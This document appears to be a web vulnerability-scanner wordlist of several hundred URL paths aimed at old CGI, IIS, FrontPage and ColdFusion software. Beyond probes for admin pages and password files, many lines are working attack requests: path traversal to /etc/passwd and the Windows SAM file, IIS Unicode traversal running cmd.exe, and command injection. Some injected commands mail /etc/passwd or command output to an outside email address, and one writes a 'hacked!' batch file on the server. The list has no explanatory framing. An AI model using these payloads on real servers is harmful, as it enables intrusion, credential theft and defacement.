/cgi-bin/alibaba.pl|dir
/cgi-bin/alibaba.pl|dir
/cgi-bin/aliredir.exe
/cgi-bin/allmanage/adp
/cgi-bin/allmanage.cgi
/cgi-bin/allmanage/k
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanageup.pl
/cgi-bin/allmanage/userfile.dat
/cgibin/amadmin.pl?setpasswd
/cgi-bin/AnyBoard.cgi
/cgi-bin/anyboard.cgi
/cgi-bin/AnyForm
/cgi-bin/AnyForm2
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=................&f romfile=Boot.ini
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/axs.cgi
/cgi-bin/bash
/cgi-bin/bb-ack.sh
/cgi-bin/bb-dnbd
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hist.sh
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/bb-replog.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bigconf.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20riotnation@hotmail.com|& f6=^a.*&action=searchdbdisplay
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/build.cgi
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/cachemgr.cgi
/cgi-bin/calendar
/cgi-bin/calender_admin.pl
/cgi-bin/calender.pl
/cgi-bin/campas
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cgi-bin/carbo.dll
/cgi-bin/cart32.exe/expdate
/cgi-bin/cart.pl
/cgi-bin/cat
/cgi-bin/cgiemail/uargg.txt
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgi-lib.pl
/cgi-bin/CGImail.exe
/cgi-bin/cgimail.exe
/cgi-bin/Cgitest.exe
/cgi-bin/cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/cgiwrap
/cgi-bin/classified.cgi
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/.cobalt/siteUserMod.cgi
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/commander.pl
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/core
/cgi-bin/Count.cgi
/cgi-bin/count.cgi
/cgi-bin/counterbanner
/cgi-bin/counterbanner-ord
/cgi-bin/counterfiglet
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/cgi-bin/counterfiglet-ord
/cgi-bin/counter-ord
/cgi-bin/cpmdaemon.cgi
/cgi-bin/csh
/cgi-bin/cvsweb.cgi
/cgi-bin/data/nicks
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/day5notifier
/cgi-bin/db2www/library/********.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host= &last_page=db2www0022.html&fn=db2www.html
/cgi-bin/dbman/db.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/cgi-bin/dfire.cgi
/cgi-bin/dig.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/dnewsweb
/cgi-bin/donothing
/cgi-bin/download.cgi
/cgi-bin/dumpenv
/cgi-bin/dumpenv.pl
/cgi-bin/echo
/cgi-bin/echo.bat
/cgi-bin/edit.pl
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=riotnation@hotmail.com
/cgi-bin/ews
/cgi-bin/excite
/cgi-bin/ezmlm-cgi
/cgi-bin/faxsurvey
/cgi-bin/faxsurvey?/bin/ls%20-a
/cgi-bin/.fhp
/cgi-bin/fi
/cgi-bin/fi?/etc/passwd
/cgi-bin/filemail
/cgi-bin/filemail.cgi
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.cgi
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename= 99.10.28.15.23.username.|/bin/ls|
/cgi-bin/finger?@localhost
/cgi-bin/finger.pl
/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+riotnation@ hotmail.com+%3C+etc%2Fpasswd
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/cgi-bin/foo.cmd?xxx&dir
/cgi-bin/FormHandler.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/FormMail.pl
/cgi-bin/formmail.pl
/cgi-bin/formprocessor.asp?MailTo=riotnation@hotmail.com&Ma ilFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/formto.pl
/cgi-bin/fortune
/cgi-bin/forum-admin.pl
/cgi-bin/forumdisplay.cgi
/cgi-bin/forum.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplorer.exe
/cgi-bin/ftpdiag.cgi
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/cgi-bin/futureforum.cgi
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/get16.exe
/cgi-bin/get32.exe
/cgi-bin/get32.exe|dir
/cgi-bin/getdoc.cgi
/cgi-bin/gH.cgi
/cgi-bin/glimpse
/cgi-bin/guestadd.pl
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/GW5
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/GWWEB.EXE
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/hello.bat
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/htimage.exe
/cgi-bin/htmldocs
/cgi-bin/html_page?TEMPLATE=main
/cgi-bin/htmlscript
/cgi-bin/htmlscript?../../../../../../etc/passwd
/cgi-bin/htsearch
/cgi-bin/htsearch?exclude=%60%60
/cgi-bin/icat
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap
/cgi-bin/imagemap.c
/cgi-bin/imagemap.exe
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/info2html
/cgi-bin/info2www
/cgi-bin/info2www?(../../../../../../../bin/mail
/perl.exe
/perl/files.pl
/perlshop.cgi
/pfdisplay.cgi
/phf
/photoads/
/photoads/cgi-bin/
/photoads/cgi-bin/env.cgi
/.photon/voyager/config.full
/php.cgi
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/ping all
/ping?SomeCrapHere
/piranha/secure/passwd.php3
/piranha/secure/passwd.php3?username=piranha&passwd=q
/pollit
/Poll_It_SSI_v2.0.cgi
/Poll_It_v2.0.cgi
/post16.exe
/ppwb/Temp/
/ppwd
/prd.i/pgen/
/printenv
/_private
/_private/form_results.htm
/_private/form_results.txt
/_private/orders.htm
/_private/orders.txt
/_private/orders.txt
/_private/register.htm
/_private/register.txt
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt
/_private/shopping_cart.mdb
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/pservlet.html
/PSUser/PSCOErrPage.htm
/publisher/
/pw/storemgr.pw
/quikstore.cfg
/random_banner/index.cgi?image_list=alternative_image.list&html_f ile=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_f ile=|ls%20-la|
/redir.cgi
/redirect.cgi
/redirect.pl
/redir.pl
/repost.asp
/rguest.exe
/robots.txt
/~root
/~root/
/root/
/rpm_query
/rsh
/rwwwshell.pl
/s97_cgi.exe
/s_97.vts
/sam._
/samples/
/samples/search/queryhit.htm
/~sbin/
/******/
/scripts
/scripts/
/scripts/alibaba.pl|dir
/scripts/args.bat
/scripts/args.cmd
/scripts/awl/auctionweaver.pl
/scripts/bdir.htr
/scripts/bigconf.cgi
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/c32web.exe/ChangeAdminPassword
/scripts/Carello/add.exe
/scripts/cart32.exe/cart32clientlist
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/CGImail.exe
/scripts/cgimail.exe
/scripts/Cgitest.exe
/scripts/../../cmd.exe
/scripts/cmd.exe
/scripts/../../cmd.exe?%2FC+echo+"hacked!">c:hello.bat
/scripts/convert.bas
/scripts/counter.exe
/scripts/cpshost.dll
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:
/scripts/dbman/db.cgi?db=invalid-db
/scripts/dbman/db.cgi?db=tedb
/scripts/dbmlparser.exe
/scripts/emurl/RECMAN.dll
/scripts/emurl/RECMAN.dll?
/scripts/excite
/scripts/files.pl
/scripts/foo.cmd?xxx&dir
/scripts/Fpadmcgi.exe
/scripts/fpcount.exe
/scripts/fpexplorer.exe
/scripts/get32.exe|dir
/scripts/GW5/GWWEB.EXE
/scripts/htimage.exe
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/bdir.htr?dir=ht??c:
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/ism.dll%3fhttp/dir
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/ism.dll?http/dir%20..../
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/imagemap.exe
/scripts/input2.bat
/scripts/input.bat
/scripts/issadmin/bdir.htr
/scripts/mlog.html
/scripts/mylog.html
/scripts/no-such-file.pl
/scripts/perl
/scripts/perl?
/scripts/perl.exe
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/phpmlog.phtml
/scripts/phpmylog.phtml
/scripts/plusmail
/scripts/postinfo.asp
/scripts/process_bug.cgi
/scripts/proxy/w3proxy.dll
/scripts/pu3.pl
/scripts/query?mss=../config
/scripts/repost.asp
/scripts/repost.asp
/scripts/rguest.exe
/scripts/run.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/author.idq
/scripts/samples/search/filesize.idq
/scripts/samples/search/filetime.idq
/scripts/samples/search/queryhit.idq
/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiM axRecordsPerPage=10&CiScope=%2F&TemplateName=query hit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2F search%2Fqueryhit.htm
/scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiM axRecordsPerPage=10&CiScope=%2F&TemplateName=query hit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2F search%2Fqueryhit.htm
/scripts/samples/search/simple.idq
/scripts/samples/search/webhits.exe
/scripts/******.bat%3f&dir
/scripts/******.cmd%3f&dir
/scripts/scriptssnorkerz.bat
/scripts/scriptssnorkerz.cmd
/scripts/search.cgi?letter=........winnt
/scripts/slxweb.dll
/scripts/slxweb.dll/admin
/scripts/test.bat
/scripts/test.exe
/scripts/tools/dsnform.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20SQL&dbq=c:web.mdb&newdb=CREA TE_DB&attr=
/scripts/tst.bat|dir
/scripts/upload.asp
/scripts/upload.asp
/scripts/uploader.exe
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wguest.exe
/scripts/win-c-sample.exe
/scripts/wsisa.dll
/scripts/wsisa.dll/WService=anything?WSMadmin
/search
/search%3f
/search97/s97_cgi.exe
/search97/search97.vts
/search97.vts
/search.dll
/search.dll?search?query=%00&logic=AND
/search/iaquery.exe%3f
/secret/index.htm
/secret/index.html
/secure/.htaccess
/secure/.wwwacl
/server%20logfile
/server-status
/service.pwd
/servlet/
/servlet/file
/servlet/SessionServlet
/servlet/test/pathInfo/test
/servlet/viewsource.jsp
/session/adminlogin
/session/adminlogin?RCpage=/sysadmin/index.stm
/session/admnlogin
/shopper.conf
/shop.pl
/showcode.asp
/showfile.asp
/*.shtml/
/shtml.exe
/site.csc
/site/eg/source.asp
/siteman000510/siteman.php3
/smdata.dat
/SPSamp/AdvWorks/equipment/catalog_type.asp
/srchadm
/ss.cfg
/ssi/envout.bat
/startstop.html?.cfm
/stat/
/stats/
/status
/store/
/submit.php
/subscribe.pl
/suche%3f
/survey
/survey.cgi
/tcsh
/~test
/test
/test%2ejsp
/test.bat
/test-cgi
/test.jsp..
/test.jsp../
/test.php3
/textcounter.pl
/~tmp
/~tmp/
/today.nsf
/today.nsf/
/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%2 8*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq= ..%2F..%2Fwwwroot%2goatfart.html&newdb=CREATE_DB&a ttr=
/tree.dat
/tst.bat
/ubb/cgi-bin/postings.cgi
/unlg1.1
/update/
/update.cgi
/update.pl
/upload/
/uploader.exe
/uploadx.asp
/~usr/
/usr/local/apache/share/htdocs/.htaccess
/usr/local/apache/share/htdocs/.htaccess
/usr/openwin/bin/kcms_configure
/~uucp/
/~var/
/viewcode.asp
/view-source
/viewsource.jsp
/visadmin.exe
/_vti_bin
/_vti_bin/fpcount.exe
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll/tstt.htm
/_vti_bin/shtml.exe
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/mtd2lv.dll
/__vti_inf.html
/_vti_inf.html
/_vti_log/author.log
/_vti_pvt
/_vti_pvt/access.cnf
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/admin.pwd
/_vti_pvt/author.log
/_vti_pvt/authors.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.cnf
/_vti_pvt/service.grp
/_vti_pvt/service.pwd
/_vti_pvt/service.pwd
/_vti_pvt/services.cnf
/_vti_pvt/service.stp
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/svcacl.cnf
/_vti_pvt/users.pwd
/_vti_pvt/writeto.cnf
/_vti_pwd/administrators.pwd
/w3proxy.dll
/webcart/
/webcart-lite/
/webdist.cgi
/webfind.exe
/webgais
/webplus
/websendmail
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/WebSTAR
/Web_Store
/wguest.exe
/WhatsNew/
/whois.cgi
/win-c-sample.exe
/windmail.exe
/..../Windows/Admin.pwl
/winnt
/."./."./winnt/reapir/sam._%20.pl
/../../../../../winnt/repair/sam._
/......winnt
epairsam._
/wrap
/WS_FTP.INI
/WS_FTP.ini
/ws_ftp.ini
/www
/.wwwacl
/wwwboard
/wwwboard.pl
/wwwboard/wwwadmin.cgi
/wwwboard/wwwadmin.pl
/wwwboard/wwwboard.pl
:8888/cgi-bin/admin/admin
:8765/
:8100//WEB-INF/
:801/../../../../etc/shadow
:8002/Newuser?Image=../../database/rbsserv.mdb
:8000/cgi/wja
:2301/
/wwwboard/passwd.txt
/website/
/WebShop/templates/cc.txt
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/webcart/
/webadmin/
/web/bb-hist.sh
/WCB/databases/users.passwd
/WCB/databases/instructors.passwd
/way-board/way-board.cgi
/users/scripts/submit.cgi
/ultraboard.pl
/tools/newdsn.exe
/today.nsf
/tmp/sims_setup.dat
/test/test.cgi
/tcb/auth/files/
/tcb/
/sults_Test/testorder.txt
/StoreDB/
/store/
/status/
/ssi/envout.bat
/ss.cfg
/siteman000510/siteman.php3
/site/eg/source.asp
/showfile.asp
/shop/
/session/adminlogin
/servlet//..//../o.jsp
/server-status
/server-info
/server%20logfile
/secure/.wwwacl
/search97.vts
/scripts/wsisa.dll/WService=anything?WSMadmin
/scripts/uploadn.asp
/scripts/tools/newdsn.exe
/scripts/tools/logs.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/dnsform.exe
/scripts/tools/ctss.idc
/scripts/tools/ct.htx
/scripts/test.pl%3F+.htr
/scripts/slxweb.dll
/scripts/samples/search/webhits.exe
/scripts/samples/details.idq
/scripts/samples/details.idc
/scripts/samples/ctguestb.idc
/scripts/repost.asp
/scripts/rb.dll
/scripts/pu3.pl
/scripts/pu3.cgi
/scripts/no-such-file.pl
/scripts/isapi/srch.htm
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/bdir.htr?dir=ht??c:\
/scripts/fpcount.exe
/scripts/default.asp%20.pl
/scripts/dbman/db.cgi?db=no-db
/scripts/counter.exe
/scripts/convert.bas
/scripts/cgimail.exe
/scripts/cart32.exe/cart32clientlist
/scripts/c32web.exe/ChangeAdminPassword
/scripts/abracadabra.cmd
/scripts/abracadabra.bat
/scripts/../../cmd.exe
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/*.pl
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/******.cgi%00
/samples/search/queryhit.htm
/samples/
/s%65cure
/root/
/robots.txt
/roads/cgi/search.pl
/register/
/random_banner/index.cgi
/pw/storemgr.pw
/purchase/
/publisher/
/pub/
/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
/prxdocs/misc/prxrch.idq
/prxdocs/
/products/phpPhotoAlbum/explorer.php
/product.asp
/piranha/secure/passwd.php3
/phpPhotoAlbum/getalbum.php
/phpPhotoAlbum/explorer.php?folder=../../../../
/perl/files.pl
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/
/pccsmysqladm/incs/dbconnect.inc
/passwords/
/ows-bin/*.bat
/orders/results
/orders/import.txt
/orders/
/orders.htm
/orderform/orders.txt
/order/
/opt/netscape/suitespot/admin-serv/config/admpw
/onlineor.htm
/officescan/cgi/jdkRqNotify.exe
/officescan/
/null.htw
/notexist.idq
/notexist.idc
/notexist.ida
/notexist.htw
/names.nsf
/mylog.html
/msadc/Samples/SELECTOR/showcode.asp
/msadc/samples/adctest.asp
/msadc/msadcs.dll
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/mlog.html
/manage/cgi/cgiproc?!
/mall_log_files/
/main.asp%81
/mailfile.cgi
/login/
/log.nsf
/incoming/
/includes/global.inc
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/issamples/query.idq
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/fastq.idq
/iissamples/exair/Search/search.idq
/iissamples/exair/Search/query.idq
/iissamples/exair/search/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/howitworks/codebrws.asp
/iishelp/iis/misc/iirturnh.htw
/iisadmpwd/anot3.htr
/iisadmpwd/anot.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp.htr
/iisadmpwd/achg.htr
/htdocs/_vti_pvt/service.pwd
/home/
/guestbook/
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\ repair\\sam._
/form-totaller/form-totaller.cgi
/form_results.txt
/feedback.txt
/exec/show/config/cr
/everythingform.cgi
/etc/tcb/aa/user/
/etc/shadow
/etc/security/passwd.adjunct
/etc/security/passwd
/etc/passwd
/etc/master.passwd
/dvwssr.dll
/domcfg.nsf/?open
/doc
/DMR/
/default.asp::$DATA
/default.asp
/ddrint/bin/ddicgi.exe
/DataBase/
/database.nsf
/cp/rac/nsManager.cgi
/config/html/cnf_gi.htm
/code.php3
/cgi-win/uploader.exe
/cgi-shl/win-c-sample.exe
/cgi-shl/
/cgi-dos/args.cmd
/cgi-dos/args.bat
/cgi-dos/
/cgi-bin/YaBB.pl
/cgi-bin/www-sql
/cgi-bin/wwwboard/passwd.txt
/cgi-bin/wwwboard.pl
/cgi-bin/wwwadmin.pl
/cgi-bin/ws_ftp.ini
/cgi-bin/wrap.cgi
/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
/cgi-bin/windmail.exe
/cgi-bin/win2win.cgi
/cgi-bin/whois_raw.cgi
/cgi-bin/wguest.exe
/cgi-bin/webwho.pl
/cgi-bin/webutils.pl
/cgi-bin/webutil.pl
/cgi-bin/webspirs.cgi
/cgi-bin/websendmail
/cgi-bin/webplus.exe
/cgi-bin/webplus
/cgi-bin/webmap.pl
/cgi-bin/webmap.cgi
/cgi-bin/webgais
/cgi-bin/webdist.cgi
/cgi-bin/Web_Store/web_store.cgi
/cgi-bin/wconsole.dll
/cgi-bin/wais.pl
/cgi-bin/w3-msql
/cgi-bin/visitor.exe
/cgi-bin/visadmin.exe?user=guest
/cgi-bin/view-source
/cgi-bin/upload.pl
/cgi-bin/unlg1.2
/cgi-bin/unlg1.1
/cgi-bin/UBB/ubb_library.pl
/cgi-bin/tst.bat
/cgi-bin/tigvote.cgi
/cgi-bin/textcounter.pl
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin/survey.cgi
/cgi-bin/subscribe.pl
/cgi-bin/store.cgi
/cgi-bin/stats.cgi
/cgi-bin/ssi//%2e%2e/%2e%2e/etc/passwd
/cgi-bin/sojourn.cgi
/cgi-bin/site_ftp.pl
/cgi-bin/shopper.cgi
/cgi-bin/sendtemp.pl
/cgi-bin/sendform.cgi
/cgi-bin/search/search.cgi
/cgi-bin/search.cgi
/cgi-bin/sawmill5
/cgi-bin/sawmill
/cgi-bin/rwwwshell.pl
/cgi-bin/rpm_query
/cgi-bin/robpoll.cgi
/cgi-bin/rguest.exe
/cgi-bin/responder.cgi
/cgi-bin/replicator/webpage.cgi
/cgi-bin/redir.exe
/cgi-bin/quikstore.cgi
/cgi-bin/query
/cgi-bin/profile.cgi
/cgi-bin/ppdscgi.cgi
/cgi-bin/postcards.cgi
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/post_query.pl
/cgi-bin/post_query
/cgi-bin/pollit
/cgi-bin/plusmail
/cgi-bin/ping.cgi
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php
/cgi-bin/phf.pp
/cgi-bin/phf.cgi
/cgi-bin/phf
/cgi-bin/pfdisplay.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/perl.exe
/cgi-bin/passwd.txt
/cgi-bin/pals-cgi
/cgi-bin/page-og.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/nto
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/nph-error.pl
/cgi-bin/nph-error.cgi
/cgi-bin/nlog-smb.cgi
/cgi-bin/news/news.cgi
/cgi-bin/news.cgi
/cgi-bin/netauth.cgi
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w
/cgi-bin/message.cgi
/cgi-bin/mdma.bat
/cgi-bin/man.sh
/cgi-bin/mailmachine.cgi
/cgi-bin/maillist.pl
/cgi-bin/maillist.cgi
/cgi-bin/mailit.pl
/cgi-bin/mailform.exe
/cgi-bin/MachineInfo
/cgi-bin/lsin.exe
/cgi-bin/login.cgi
/cgi-bin/log
/cgi-bin/loadpage.cgi
/cgi-bin/lmail.pl
/cgi-bin/lister
/cgi-bin/jj
/cgi-bin/input2.bat
/cgi-bin/input.bat
/cgi-bin/infosrch.cgi
/cgi-bin/info2www
/cgi-bin/imapncsa.exe
/cgi-bin/imagemap.exe
/cgi-bin/icat.cgi
/cgi-bin/icat
/cgi-bin/htsearch
/cgi-bin/htmlscript?../../../../etc/passwd
/cgi-bin/htmldocs
/cgi-bin/html_page
/cgi-bin/htimage.exe
/cgi-bin/htgrep/htgrep.cgi
/cgi-bin/htgrep/file=index.html&hdr=/etc/passwd
/cgi-bin/hsx.cgi
/cgi-bin/hello.bat
/cgi-bin/handler.cgi
/cgi-bin/handler
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/guestbook.cgi
/cgi-bin/guest.cgi
/cgi-bin/gH.cgi
/cgi-bin/getdoc.cgi
/cgi-bin/get32.exe
/cgi-bin/get16.exe
/cgi-bin/ftp/ftp.pl
/cgi-bin/fruity_sub.pl
/cgi-bin/fpexplore.exe
/cgi-bin/forums/list.php?f=DESIRED_PHP_FILE_WITHOUT_EXTENSION
/cgi-bin/formnow.cgi
/cgi-bin/formmail.pl
/cgi-bin/form.cgi
/cgi-bin/finger
/cgi-bin/filemail.pl
/cgi-bin/faxsurvey
/cgi-bin/excite
/cgi-bin/environ.cgi
/cgi-bin/empower
/cgi-bin/edit.pl
/cgi-bin/dumpenv.pl
/cgi-bin/dnewsweb
/cgi-bin/dig.cgi
/cgi-bin/dfire.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/db2www/library/********.d2w/show
/cgi-bin/db_manager.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/day5datacopier.cgi
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/cgi-bin/counterfiglet
/cgi-bin/counter.pl
/cgi-bin/count.cgi
/cgi-bin/commerce.cgi
/cgi-bin/commander.pl
/cgi-bin/clickresponder.pl
/cgi-bin/click.pl
/cgi-bin/classifieds.cgi
/cgi-bin/change-your-password.pl~
/cgi-bin/cgiwrap
/cgi-bin/cgimail.exe
/cgi-bin/cgiforum.pl
/cgi-bin/ceilidh.exe
/cgi-bin/cbmc/forums.cgi
/cgi-bin/cartmanager.cgi
/cgi-bin/cart32/tempfiles.list
/cgi-bin/cardboard.cgi
/cgi-bin/campas
/cgi-bin/calender_admin.pl
/cgi-bin/calender.pl
/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/bnbform.cgi
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bigconf.cgi
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-hist.sh
/cgi-bin/axs.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/authenticate.cgi
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
/cgi-bin/AT-generate.cgi
/cgi-bin/AT-admin.cgi
/cgi-bin/apexec.pl
/cgi-bin/AnyForm2
/cgi-bin/AnyBoard.cgi
/cgi-bin/amlite/amadmin.pl
/cgi-bin/amadmin.pl
/cgi-bin/aliredir.exe
/cgi-bin/alibaba.pl
/cgi-bin/aglimpse
/cgi-bin/af.cgi
/cgi-bin/Admin_files/
/cgi-bin/add_ftp.cgi
/cgi-bin/.wwwacl
/cgi-bin/.htaccess
/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir+c:\\
/cgi-bin/
/cgi-auth/userreg.cgi
/cgi/commerce.cgi
/cgi/cgiproc
/cfusion/database/smpolicy.mdb
/cfusion/database/
/cfusion/cfapps/security/realm_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/
/CFIDE/Administrator/startstop.html
/cfdocs/zero.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/
/cfdocs/root.cfm
/cfdocs/expressions.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/eval.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/examples/mainframeset.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
